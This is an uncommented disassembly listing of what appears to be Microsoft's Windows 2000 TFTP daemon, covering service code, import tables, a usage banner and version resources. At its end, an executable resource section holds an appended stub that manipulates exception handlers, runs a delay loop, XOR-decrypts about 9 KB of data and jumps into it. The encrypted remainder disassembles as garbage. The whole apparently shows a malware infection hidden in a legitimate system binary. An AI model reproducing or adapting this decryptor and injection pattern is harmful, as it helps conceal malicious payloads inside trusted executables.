lea eax, [ebp+cbData]
mov [ebp+cbData], edi
push eax ; lpcbData
lea eax, [ebp+Type]
push offset byte_1005D58 ; lpData
push eax ; lpType
push ebx ; lpReserved
push offset aReadable ; "readable"
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExA
cmp eax, ebx
jz short loc_10038C6
call ds:GetLastError
jmp short loc_10038CF
; ---------------------------------------------------------------------------
loc_10038C6: ; CODE XREF: sub_10037BF+FD�j
cmp [ebp+Type], 1
jnz short loc_10038CF
inc [ebp+var_4]
loc_10038CF: ; CODE XREF: sub_10037BF+105�j
; sub_10037BF+10B�j
lea eax, [ebp+cbData]
mov [ebp+cbData], edi
push eax ; lpcbData
lea eax, [ebp+Type]
push offset byte_1005D90 ; lpData
push eax ; lpType
push ebx ; lpReserved
push offset aWritable ; "writable"
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExA
cmp eax, ebx
jz short loc_10038F6
call ds:GetLastError
jmp short loc_10038FF
; ---------------------------------------------------------------------------
loc_10038F6: ; CODE XREF: sub_10037BF+12D�j
cmp [ebp+Type], 1
jnz short loc_10038FF
inc [ebp+var_4]
loc_10038FF: ; CODE XREF: sub_10037BF+135�j
; sub_10037BF+13B�j
push [ebp+hKey] ; hKey
call ds:RegCloseKey ; RegCloseKey
mov eax, [ebp+var_4]
pop esi
pop edi
loc_100390D: ; CODE XREF: sub_10037BF+32�j
pop ebx
leave
retn
sub_10037BF endp
; =============== S U B R O U T I N E =======================================
sub_1003910 proc near ; CODE XREF: sub_1001665+193�p
Dst = byte ptr -1F4h
sub esp, 1F4h
cmp byte ptr dword_1005E07+1, 0
push ebx
push ebp
push esi
push edi
mov ebp, 1F4h
mov ebx, (offset dword_1005E07+1)
jnz short loc_100393D
push ebp ; Count
push offset Source ; "\\tftpdroot\\"
push ebx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
loc_100393D: ; CODE XREF: sub_1003910+1B�j
lea eax, [esp+204h+Dst]
push ebp ; nSize
push eax ; lpDst
push ebx ; lpSrc
call ds:ExpandEnvironmentStringsA ; ExpandEnvironmentStringsA
test eax, eax
jnz short loc_1003952
push 57h
jmp short loc_10039CA
; ---------------------------------------------------------------------------
loc_1003952: ; CODE XREF: sub_1003910+3C�j
mov ecx, eax
lea esi, [esp+204h+Dst]
mov edi, ebx
or edx, 0FFFFFFFFh
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
rep movsb
mov edi, ebx
mov ecx, edx
repne scasb
not ecx
dec ecx
cmp byte ptr dword_1005E07[ecx], 2Fh
lea eax, dword_1005E07[ecx]
jnz short loc_1003986
mov byte ptr [eax], 5Ch
loc_1003986: ; CODE XREF: sub_1003910+71�j
cmp byte ptr [eax], 5Ch
jz short loc_10039B7
cmp ecx, ebp
jnb short loc_10039B7
mov edi, offset asc_100155C ; "\\"
mov ecx, edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebp, ecx
mov edi, ebx
mov ecx, edx
repne scasb
mov ecx, ebp
dec edi
shr ecx, 2
rep movsd
mov ecx, ebp
and ecx, 3
rep movsb
loc_10039B7: ; CODE XREF: sub_1003910+79�j
; sub_1003910+7D�j
mov edi, ebx
mov ecx, edx
xor eax, eax
push 1
repne scasb
not ecx
dec ecx
mov dword_1005FFC, ecx
loc_10039CA: ; CODE XREF: sub_1003910+40�j
pop eax
pop edi
pop esi
pop ebp
pop ebx
add esp, 1F4h
retn
sub_1003910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10039D6 proc near ; CODE XREF: sub_1002F31+148�p
; sub_1002F31+159�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
mov al, [esi]
test al, al
jz short loc_1003A2E
cmp al, 2Ah
jz short loc_1003A04
cmp al, 3Fh
jz short loc_10039F7
mov ecx, [ebp+arg_4]
cmp al, [ecx]
jnz short loc_1003A25
inc ecx
push ecx
jmp short loc_1003A01
; ---------------------------------------------------------------------------
loc_10039F7: ; CODE XREF: sub_10039D6+14�j
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jz short loc_1003A25
inc eax
push eax
loc_1003A01: ; CODE XREF: sub_10039D6+1F�j
inc esi
jmp short loc_1003A1B
; ---------------------------------------------------------------------------
loc_1003A04: ; CODE XREF: sub_10039D6+10�j
mov edi, [ebp+arg_4]
lea eax, [esi+1]
push edi
push eax
call sub_10039D6
test eax, eax
jnz short loc_1003A29
cmp [edi], al
jz short loc_1003A25
inc edi
push edi
loc_1003A1B: ; CODE XREF: sub_10039D6+2C�j
push esi
call sub_10039D6
test eax, eax
jnz short loc_1003A29
loc_1003A25: ; CODE XREF: sub_10039D6+1B�j
; sub_10039D6+27�j ...
xor eax, eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A29: ; CODE XREF: sub_10039D6+3D�j
; sub_10039D6+4D�j
push 1
pop eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A2E: ; CODE XREF: sub_10039D6+C�j
mov ecx, [ebp+arg_4]
xor eax, eax
cmp [ecx], al
setz al
loc_1003A38: ; CODE XREF: sub_10039D6+51�j
; sub_10039D6+56�j
pop edi
pop esi
pop ebp
retn 8
sub_10039D6 endp
; [00000006 BYTES: COLLAPSED FUNCTION _chkstk. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NotifyAddrChange. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetIpAddrTable. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001560
push offset loc_1003BF0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
push 1
call ds:__set_app_type ; __set_app_type
add esp, 4
mov dword_10062D0, 0FFFFFFFFh
mov dword_10062D4, 0FFFFFFFFh
call ds:__p__fmode ; __p__fmode
mov ecx, dword_100600C
mov [eax], ecx
call ds:__p__commode ; __p__commode
mov edx, dword_1006008
mov [eax], edx
mov eax, ds:_adjust_fdiv
mov ecx, [eax]
mov dword_10062D8, ecx
call nullsub_2
mov eax, dword_1005DC4
test eax, eax
jnz short loc_1003AE1
push offset loc_1003BD0
call ds:__setusermatherr ; __setusermatherr
add esp, 4
loc_1003AE1: ; CODE XREF: .text:01003AD1�j
call sub_1003BB0
push offset dword_100500C
push offset dword_1005008
call _initterm ; _initterm
add esp, 8
mov edx, dword_1006004
mov [ebp-28h], edx
lea eax, [ebp-28h]
push eax
mov ecx, dword_1006000
push ecx
lea edx, [ebp-20h]
push edx
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-1Ch]
push ecx
call ds:__getmainargs ; __getmainargs
add esp, 14h
push offset dword_1005004
push offset dword_1005000
call _initterm ; _initterm
add esp, 8
call ds:__p___initenv ; __p___initenv
mov edx, [ebp-20h]
mov [eax], edx
mov eax, [ebp-20h]
push eax
mov ecx, [ebp-2Ch]
push ecx
mov edx, [ebp-1Ch]
push edx
call sub_1001570
; ---------------------------------------------------------------------------
add esp, 0Ch
mov [ebp-24h], eax
push eax
call ds:exit ; exit
; ---------------------------------------------------------------------------
jmp short loc_1003B80
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-30h], ecx
push eax
push ecx
call _XcptFilter ; _XcptFilter
add esp, 8
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov edx, [ebp-30h]
push edx
call ds:_exit ; _exit
; ---------------------------------------------------------------------------
loc_1003B80: ; CODE XREF: .text:01003B5C�j
add esp, 4
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION _XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_1003BB0 proc near ; CODE XREF: .text:loc_1003AE1�p
push 30000h ; Mask
push 10000h ; NewValue
call _controlfp ; _controlfp
add esp, 8
retn
sub_1003BB0 endp
; ---------------------------------------------------------------------------
align 10h
loc_1003BD0: ; DATA XREF: .text:01003AD3�o
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_1003BF0: ; DATA XREF: .text:01003A5A�o
jmp ds:_except_handler3
; [00000006 BYTES: COLLAPSED FUNCTION _controlfp. PRESS KEYPAD "+" TO EXPAND]
dd 3D7Ch, 2 dup(0FFFFFFFFh), 3E60h, 10F4h, 3CA4h, 2 dup(0FFFFFFFFh)
dd 4012h, 101Ch, 3C88h, 2 dup(0FFFFFFFFh), 40A2h, 1000h
dd 3DCCh, 2 dup(0FFFFFFFFh), 4172h, 1144h, 3DC0h, 2 dup(0FFFFFFFFh)
dd 41A2h, 1138h, 3D04h, 2 dup(0FFFFFFFFh), 42F6h, 107Ch
dd 5 dup(0)
dd 4092h, 4020h, 407Eh, 4070h, 4052h, 403Eh, 0
dd 3E6Ch, 3FF6h, 3FE6h, 3FCEh, 3FBEh, 3FB2h, 3FA2h, 3E7Ah
dd 3E8Ah, 3EA0h, 3EB0h, 3ECCh, 3EDAh, 3EF2h, 3EFEh, 3F0Ch
dd 3F24h, 3F3Ch, 3F56h, 3F62h, 3F70h, 3F78h, 3F92h, 0
dd 4282h, 4272h, 428Eh, 4230h, 4226h, 421Eh, 4214h, 420Ah
dd 4200h, 41F8h, 41F0h, 41E6h, 41DCh, 41D2h, 41CAh, 41C2h
dd 4302h, 42E2h, 42D0h, 42C2h, 42B2h, 42A2h, 41B8h, 4262h
dd 4254h, 424Ch, 423Ah, 4242h, 41B0h, 0
dd 3E52h, 8000006Fh, 80000073h, 3E08h, 80000009h, 3E1Ah
dd 8000000Fh, 3E34h, 8000000Ah, 3E42h, 80000003h, 8000000Ch
dd 80000002h, 80000037h, 80000017h, 80000014h, 0
dd 417Ch, 4190h, 0
dd 4126h, 4168h, 415Eh, 4154h, 4142h, 4130h, 411Ah, 4112h
dd 410Ah, 40F4h, 40EAh, 40D4h, 40B0h, 40C2h, 0
dd 53570019h, 65764541h, 6553746Eh, 7463656Ch, 1B0000h
aWsagetoverlapp db 'WSAGetOverlappedResult',0
align 4
a2 db '2',0
aWsarecvfrom db 'WSARecvFrom',0
dw 0Fh
aWsacloseevent db 'WSACloseEvent',0
db '=',0
aWsasocketa db 'WSASocketA',0
align 10h
aWs2_32_dll db 'WS2_32.dll',0
align 4
aM db 'Œ',0
aExitprocess db 'ExitProcess',0
dw 12Dh
aGetlasterror db 'GetLastError',0
align 2
dw 2FDh
aWaitforsingleo db 'WaitForSingleObject',0
a4 db '4',0
aCreateeventa db 'CreateEventA',0
align 10h
db 0C5h ; Å
db 1, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
dd 654801B6h, 72437061h, 65746165h, 1DE0000h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
dw 1BAh
aHeapfree db 'HeapFree',0
align 2
dw 1Eh
aClosehandle db 'CloseHandle',0
aO db 'o',0
aEntercriticals db 'EnterCriticalSection',0
align 4
retf
; ---------------------------------------------------------------------------
db 1, 49h, 6Eh
aTerlockedincre db 'terlockedIncrement',0
align 4
db 0FBh ; û
db 2, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 1B4h
aHeapalloc db 'HeapAlloc',0
dw 252h
aResetevent db 'ResetEvent',0
align 10h
retn
; ---------------------------------------------------------------------------
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0D8h ; Ø
db 2, 54h, 72h
aYentercritical db 'yEnterCriticalSection',0
dw 2C5h
aSuspendthread db 'SuspendThread',0
dw 254h
aResumethread db 'ResumeThread',0
db 0, 90h, 2
aSetevent db 'SetEvent',0
align 2
dw 29Ch
aSetlasterror db 'SetLastError',0
align 2
aZ db 'Z',0
aDeletecritical db 'DeleteCriticalSection',0
dw 12Fh
aGetlocaltime db 'GetLocalTime',0
align 2
aP db '',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
aKernel32_dll db 'KERNEL32.dll',0
align 10h
db 0E5h ; å
db 1, 53h, 74h
aArtservicectrl db 'artServiceCtrlDispatcherA',0
dw 1DFh
aSetservicestat db 'SetServiceStatus',0
align 2
dw 1B9h
aRegisterservic db 'RegisterServiceCtrlHandlerA',0
db 84h ; „
db 1, 52h, 65h
aGclosekey db 'gCloseKey',0
dw 1A7h
aRegqueryvaluee db 'RegQueryValueExA',0
align 2
dw 19Dh
aRegopenkeyexa db 'RegOpenKeyExA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 10h
db 50h ; P
db 2, 52h, 74h
aLregisterwait db 'lRegisterWait',0
dw 184h
aRtlcreatetimer db 'RtlCreateTimer',0
align 4
db 85h ; …
db 1, 52h, 74h
aLcreatetimerqu db 'lCreateTimerQueue',0
dw 42Eh
a_chkstk db '_chkstk',0
db 0A1h ; ¡
db 1, 52h, 74h
aLderegisterwai db 'lDeregisterWaitEx',0
dw 433h
a_itoa db '_itoa',0
dw 450h
aAtoi db 'atoi',0
align 2
dw 43Dh
a_stricmp db '_stricmp',0
align 2
dw 46Dh
aMemmove db 'memmove',0
dd 7452019Dh, 6C65446Ch, 54657465h, 72656D69h, 2990000h
dd 556C7452h, 74616470h, 6D695465h, 7265h, 6F740486h, 65776F6Ch
dd 45F0072h, 70757369h, 726570h, 7473047Dh, 70636E72h
dd 746E0079h, 2E6C6C64h, 6C6C64h, 6F4E004Fh, 79666974h
dd 72646441h, 6E616843h, 6567h, 65470022h, 41704974h, 54726464h
dd 656C6261h, 70690000h, 61706C68h, 642E6970h, 6C6Ch, 78650246h
dd 7469h, 7270029Bh, 66746E69h, 2430000h, 6D697463h, 2540065h
dd 65706F66h, 17F006Eh, 646B6D5Fh, 7269h, 655F00C5h, 6F6E7272h
dd 0AA0000h, 6468635Fh, 7269h, 697402CDh, 656Dh, 7266025Bh
dd 6565h, 63660249h, 65736F6Ch, 2A40000h, 6C616572h, 636F6Ch
dd 616D028Eh, 636F6C6Ch, 1950000h, 6165725Fh, 0B00064h
dd 6F6C635Fh, 6573h, 6C5F0141h, 6B656573h, 1840000h, 65706F5Fh
dd 214006Eh, 6972775Fh, 6574h, 655F00D0h, 746978h, 585F0048h
dd 46747063h, 65746C69h, 630072h, 5F705F5Fh, 6E695F5Fh
dd 6E657469h, 580076h, 65675F5Fh, 69616D74h, 6772616Eh
dd 10C0073h, 696E695Fh, 72657474h, 82006Dh, 65735F5Fh
dd 65737574h, 74616D72h, 72726568h, 9B0000h, 6A64615Fh
dd 5F747375h, 76696466h, 690000h, 5F705F5Fh, 6D6F635Fh
dd 65646F6Dh, 6E0000h, 5F705F5Fh, 6F6D665Fh, 6564h, 5F5F0080h
dd 5F746573h, 5F707061h, 65707974h, 0C70000h, 6378655Fh
dd 5F747065h, 646E6168h, 3372656Ch, 534D0000h, 54524356h
dd 6C6C642Eh, 0B40000h, 6E6F635Fh, 6C6F7274h, 7066h, 3Ch dup(0)
_text ends
; Section 2. (virtual address 00005000)
; Virtual size : 000012DC ( 4828.)
; Section size in file : 00000E00 ( 3584.)
; Offset to raw data for section: 00003A00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 1005000h
dword_1005000 dd 0 dword_1005004 dd 0 dword_1005008 dd 0 dword_100500C dd 0 ; char Format[]
Format db ' ================================================================'
; DATA XREF: sub_1001570+4D�o
db '======== ',0Ah
db 'Abstract: '
db ' ',0Ah
db ' This implements an RFC 783 tftp daemon. '
db ' ',0Ah
db ' It listens on port 69 for requests '
db ' ',0Ah
db ' and spawns a thread to process each request. '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'TFTPD USAGE and Installation: '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' md d:/tftpd (the StartDirec'
db 'tory). ',0Ah
db ' copy //MohsinA_p90/test/tftpd.exe . '
db ' ',0Ah
db ' sc create tftpd binPath= d:/tftpd/tftpd.exe (give full path'
db '). ',0Ah
db ' sc query tftpd (check if insta'
db 'lled). ',0Ah
db ' '
db ' ',0Ah
db 'Start: '
db ' ',0Ah
db ' sc start tftpd -f (creates a log '
db 'file). ',0Ah
db 'or sc start tftpd '
db ' ',0Ah
db 'or net start tftpd '
db ' ',0Ah
db 'or sc start tftpd [-dStartDirectory] [-e] [-f] '
db ' ',0Ah
db ' Options: -e use event log. '
db ' ',0Ah
db ' -f log to file. '
db ' ',0Ah
db ' -dStartDirectory '
db ' ',0Ah
db 'Info: '
db ' ',0Ah
db ' sc interrogate tftpd (logs will be updated). '
db ' ',0Ah
db ' sc query tftpd Check whether running. '
db ' ',0Ah
db 'Stop: '
db ' ',0Ah
db ' sc stop tftpd '
db ' ',0Ah
db ' net stop tftpd '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'Variables that control what files can be read/written and by whom'
db ': ',0Ah
db ' StartDirectory - only files there will be accessible. '
db ' ',0Ah
db ' LogFile is created here. '
db ' ',0Ah
db ' ValidClients - Clients matching this ip address can read files'
db '. ',0Ah
db ' eg. you can set it to "157.55.8?.*" '
db ' ',0Ah
db ' ValidMasters - clients matching this can write and read file'
db 's. ',0Ah
db ' eg. you can set it to "" and no one can write'
db '. ',0Ah
db ' ValidReadFiles - only matching files will be served out, eg. "'
db 'r*.t?t"',0Ah
db ' ValidWriteFiles- only matching files will be accepted, eg. "w'
db '*.txt" ',0Ah
db ' '
db ' ',0Ah
db 'Client: '
db ' ',0Ah
db ' tftp [-i] servername {get|put} src_file dest_file '
db ' ',0Ah
db ' -i from binary mode, else ascii mode is used. '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' ================================================================'
db '======== ',0Ah,0
align 8
; char ServiceName[]
ServiceName db 'Tftpd',0 ; DATA XREF: sub_1001665+B�o
; .data:ServiceStartTable�o
align 10h
; SERVICE_TABLE_ENTRYA ServiceStartTable
ServiceStartTable SERVICE_TABLE_ENTRYA <offset ServiceName, offset sub_1001665>
; DATA XREF: sub_1001570:loc_1001646�o
; "Tftpd"
align 10h
off_1005CC0 dd offset aErrorUndefined ; DATA XREF: sub_100230A+73�r
; "Error undefined"
dd offset aFileNotFound ; "File not found"
dd offset aAccessViolatio ; "Access violation"
dd offset aDiskFullOrAllo ; "Disk full or allocation exceeded"
dd offset aIllegalTftpOpe ; "Illegal TFTP operation"
dd offset aUnknownTransfe ; "Unknown transfer ID"
dd offset aFileAlreadyExi ; "File already exists"
dd offset aNoSuchUser ; "No such user"
dd offset aOptionNegotiat ; "Option negotiation failure"
align 8
; BYTE Data
Data db 2Ah ; DATA XREF: sub_1002F31+143�o
; sub_10037BF+87�o
align 4
dd 0Dh dup(0)
; BYTE byte_1005D20
byte_1005D20 db 2Ah ; DATA XREF: sub_1002F31+154�o
; sub_100333A+163�o ...
align 4
dd 0Dh dup(0)
; BYTE byte_1005D58
byte_1005D58 db 2Ah ; DATA XREF: sub_1002F31+165�o
; sub_10037BF+EA�o
align 4
dd 0Dh dup(0)
; BYTE byte_1005D90
byte_1005D90 db 2Ah ; DATA XREF: sub_100333A+178�o
; sub_10037BF+11A�o
align 4
dd 0Ch dup(0)
dword_1005DC4 dd 1 align 10h
; FILE *File
File dd 0 ; DATA XREF: sub_1001665+1E5�w
; sub_1001E73:loc_1001F36�r ...
dword_1005DD4 dd 0 dword_1005DD8 dd 0 ; sub_1001665:loc_100182E�r ...
; HANDLE hHandle
hHandle dd 0 ; DATA XREF: sub_1001665+84�w
; sub_1001665+8B�r ...
; HANDLE hObject
hObject dd 0 ; DATA XREF: sub_1001665+91�w
; sub_1001E73:loc_1001F0C�r ...
align 8
; volatile LONG Addend
Addend dd 0 ; DATA XREF: sub_1001A91+26E�o
; sub_1001A91+2B3�o
; HANDLE hHeap
hHeap dd 0 ; DATA XREF: sub_10019F0+29�w
; sub_1001A1F+52�r ...
dword_1005DF0 dd 0 ; sub_1001A1F+5E�w ...
dword_1005DF4 dd 0 ; sub_1001A91+59�w ...
dword_1005DF8 dd 0 ; sub_10018DB+EF�r
dword_1005DFC dd 0 ; HANDLE Handle
Handle dd ? ; DATA XREF: sub_10018DB+F4�o
; sub_1002219+D5�o
db 3 dup(?)
dword_1005E07 dd ? ; sub_1003910+6B�r ...
align 4
dd 7Ch dup(?)
dword_1005FFC dd ? dword_1006000 dd ? dword_1006004 dd ? dword_1006008 dd ? dword_100600C dd ? dd 4 dup(?)
; struct _RTL_CRITICAL_SECTION stru_1006020
stru_1006020 _RTL_CRITICAL_SECTION <?> ; DATA XREF: sub_10018DB+14�o
; .text:01001D78�o ...
; void *Memory
Memory dd ? ; DATA XREF: sub_10018DB+2A�o
; sub_10018DB+34�w ...
dword_100603C dd ? ; HANDLE hThread
hThread dd ? ; DATA XREF: HandlerProc:loc_1001E1D�r
; HandlerProc:loc_1001E35�r
; SERVICE_STATUS_HANDLE hServiceStatus
hServiceStatus dd ? ; DATA XREF: sub_1001665+52�w
; sub_1001665+DB�r ...
dword_1006048 dd 6 dup(?) ; struct _RTL_CRITICAL_SECTION stru_1006060
stru_1006060 _RTL_CRITICAL_SECTION <?> ; DATA XREF: sub_10019F0+5�o
; sub_1001A1F+2�o ...
; LPVOID lpMem
lpMem dd ? ; DATA XREF: sub_10019F0�o
; sub_10019F0+F�w ...
dword_100607C dd ? ; struct _RTL_CRITICAL_SECTION CriticalSection
CriticalSection _RTL_CRITICAL_SECTION <?> ; DATA XREF: sub_10018DB+D�o
; sub_100287F+1�o ...
dword_1006098 dd ? ; sub_10018DB+25�w ...
dword_100609C dd ? dword_10060A0 dd ? ; sub_10018DB+A2�r ...
dd 7 dup(?)
; time_t Time
Time dq ? ; DATA XREF: sub_1001665+10A�o
; sub_1001665:loc_1001857�o ...
dword_10060C8 dd ? dword_10060CC dd ? dd 0Ch dup(?)
; struct _OVERLAPPED overlapped
overlapped _OVERLAPPED <?> ; DATA XREF: sub_10018DB+E0�o
; sub_1002219:loc_10022E9�o
align 10h
; struct _SERVICE_STATUS ServiceStatus
ServiceStatus _SERVICE_STATUS <?> ; DATA XREF: sub_1001665+10�w
; sub_1001665+63�o ...
align 10h
; struct WSAData stru_1006140
stru_1006140 WSAData <?> ; DATA XREF: sub_1001665+9C�o
dword_10062D0 dd ? dword_10062D4 dd ? dword_10062D8 dd ? align 200h
_data ends
; Section 3. (virtual address 00007000)
; Virtual size : 0000E400 ( 58368.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00004800
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 1007000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 3 dup(0)
dd 10000h, 10h, 80000018h, 3 dup(0)
dd 10000h, 1, 80000030h, 3 dup(0)
dd 10000h, 409h, 48h, 7060h, 374h, 4 dup(0)
dd 340374h, 560000h, 5F0053h, 450056h, 530052h, 4F0049h
dd 5F004Eh, 4E0049h, 4F0046h, 0
dd 0FEEF04BDh, 10000h, 50000h, 8560001h, 50000h, 8560001h
dd 3Fh, 0
dd 40004h, 1, 3 dup(0)
dd 2D4h, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
dd 66006Eh, 6Fh, 2B0h, 300001h, 300034h, 300039h, 420034h
dd 30h, 16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh
dd 65006Dh, 0
aMicrosoftCorpo:
unicode 0, <Microsoft Corporation>,0
aR:
unicode 0, <r%>
dd 460001h, 6C0069h, 440065h, 730065h, 720063h, 700069h
dd 690074h, 6E006Fh, 0
aTcpIpTrivialFi:
unicode 0, <TCP/IP Trivial file transfer daemon.>,0
align 4
a8 db '8',0
dw 0Ch
dd 460001h, 6C0069h, 560065h, 720065h, 690073h, 6E006Fh
dd 0
a5_00_2134_1:
unicode 0, <5.00.2134.1>,0
a4_0:
unicode 0, <4>
dw 0Ah
dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch, 6D0061h
dd 65h, 660074h, 700074h, 2E0064h, 780065h, 65h, 280074h
dd 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h, 690072h
dd 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h, 200074h
dd 430028h, 200029h, 69004Dh, 720063h, 73006Fh, 66006Fh
dd 200074h, 6F0043h, 700072h, 20002Eh, 390031h, 310038h
dd 31002Dh, 390039h, 39h, 0A003Ch, 4F0001h, 690072h, 690067h
dd 61006Eh, 46006Ch, 6C0069h, 6E0065h, 6D0061h, 65h, 660074h
dd 700074h, 2E0064h, 780065h, 65h, 2F007Eh, 500001h, 6F0072h
dd 750064h, 740063h, 61004Eh, 65006Dh, 0
aMicrosoftRWind:
unicode 0, <Microsoft(R) Windows (R) 2000 Operating System>,0
align 4
db '<',0
dw 0Ch
dd 500001h, 6F0072h, 750064h, 740063h, 650056h, 730072h
dd 6F0069h, 6Eh, 2E0035h, 300030h, 32002Eh, 330031h, 2E0034h
dd 31h, 44h, 560001h, 720061h, 690046h, 65006Ch, 6E0049h
dd 6F0066h, 0
dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
dd 6E006Fh, 0
dd 4B00409h, 0Bh dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_100741C
call sub_10074B5
push dword ptr fs:0
pop ebp
lea ebp, [ebp+8]
jmp loc_1007471
; =============== S U B R O U T I N E =======================================
sub_100741C proc near ; CODE XREF: .rsrc:01007403�p
var_636C112 = dword ptr -636C112h
; FUNCTION CHUNK AT 010074E4 SIZE 00000078 BYTES
; FUNCTION CHUNK AT 0100757D SIZE 00000015 BYTES
push dword ptr fs:0
mov fs:0, esp
xor ebx, ebx
push ebx
push 80000000h
push 80000000h
push ebx
push ebx
push 4000h
push ebx
push ebx
push 40h
push 10000h
push ebx ; hThread
call ds:ResumeThread ; ResumeThread
xor ebx, ebx
push ebx
push ebx
push ebx
push 1
push 80000000h
push ebx
push ebx
push 2000h
push 80000000h
push ebx ; hThread
call ds:ResumeThread ; ResumeThread
loc_1007471: ; CODE XREF: .rsrc:01007417�j
sub eax, eax
loc_1007473: ; CODE XREF: sub_100741C+5D�j
dec al
or al, al
jz short loc_100747D
jnz short loc_1007473
jmp short loc_10074E4
; ---------------------------------------------------------------------------
loc_100747D: ; CODE XREF: sub_100741C+5B�j
call $+5
pop edi
sub edi, 0FFFFFFC0h
push edi
mov edx, 243Ch
mov ecx, 19h
loc_1007494: ; CODE XREF: sub_100741C+87�j
mov al, [edi]
xor ax, cx
mov [edi], al
add edi, 1
loc_100749E: ; CODE XREF: sub_100741C+FE�j
inc ecx
dec edx
cmp edx, 0
ja short loc_1007494
pop edi
mov esp, fs:0
pop dword ptr fs:0
leave
jmp edi
sub_100741C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_10074B5 proc near ; CODE XREF: .rsrc:01007408�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_10074B5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 0F289h
dd 1E1D1C1Bh, 0D5052494h, 26010FA3h, 2A292827h, 82B5A5ABh
dd 0B9313006h, 4231106Fh, 0B360C41Ah
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_100741C
loc_10074E4: ; CODE XREF: sub_100741C+5F�j
mov ecx, [esp+edx+50h+var_636C112]
imul byte ptr [edx+44h]
inc ebp
mov bh, 67h
insd
dec edx
dec ebx
movsb
cmp [ebx+4Ch], al
enter 7661h, 53h
push esp
fimul word ptr ds:0B16AA755h
push ebx
xlat
lds ebp, [edi+7Bh]
pusha
popa
popf
push eax
aas
xor bl, dh
out 4, al ; DMA controller, 8237A-5.
; channel 2 base address
; (also sets current address)
dec ebp
outsb
adc edx, [esi+6Dh]
outsb
out dx, al
xchg eax, ebx
jno short loc_100749E
mov word ptr [ebx+68719BF4h], cs
cmp [edx-10h], edi ; CODE XREF: sub_100741C+11F�j
add [ecx+7Ah], bl
repne xor eax, 84C3B6BDh
cmp al, 86h
xchg ecx, [eax+0D2F7989h]
test al, 0DBh
clc
clc
loope near ptr loc_1007522+1
cdq
push ds
aad 0ABh
adc eax, 1DFD829Dh
movsd
into
fcmovbe st, st(4)
test eax, 0A4A44823h
cmpsb
cmpsd
fisttp qword ptr [ebx+21h]
sti
aam 0AEh
jge short loc_100757D
retn 3991h
; END OF FUNCTION CHUNK FOR sub_100741C
; ---------------------------------------------------------------------------
dd 45B6ACF9h, 79BA15E6h, 0BE42C43Ah, 0B7B5A5F8h, 0C5BD45D8h
dd 0A9A6BA97h, 0B64CDEBEh, 0B6B591C8h
db 0A1h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_100741C
loc_100757D: ; CODE XREF: sub_100741C+13B�j
mov eax, ds:0D3AF57DCh
mov esp, 0A9DCA8A9h
fstp tbyte ptr ds:20BFB837h
int 0E9h ; used by BASIC while in interpreter
retn 9A6Ch
; END OF FUNCTION CHUNK FOR sub_100741C
; ---------------------------------------------------------------------------
